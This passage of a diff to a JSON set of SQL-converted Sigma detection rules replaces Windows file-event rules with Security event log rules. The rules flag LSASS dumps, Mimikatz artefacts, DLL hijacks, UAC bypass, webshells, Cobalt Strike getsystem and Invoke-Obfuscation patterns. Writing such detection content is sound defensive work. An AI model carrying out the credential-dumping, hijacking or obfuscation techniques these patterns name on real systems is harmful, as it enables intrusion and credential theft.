"file_event_win_susp_ntds_dit.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", - "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "status": "experimental", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.credential_access", + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Legitimate add-ins" + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "status": "test", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "status": "test", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", - "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "status": "test", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", - "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Very unlikely" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "cve.2021.44077" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "status": "test", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate used of encrypted ZIP files" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + }, + { + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": 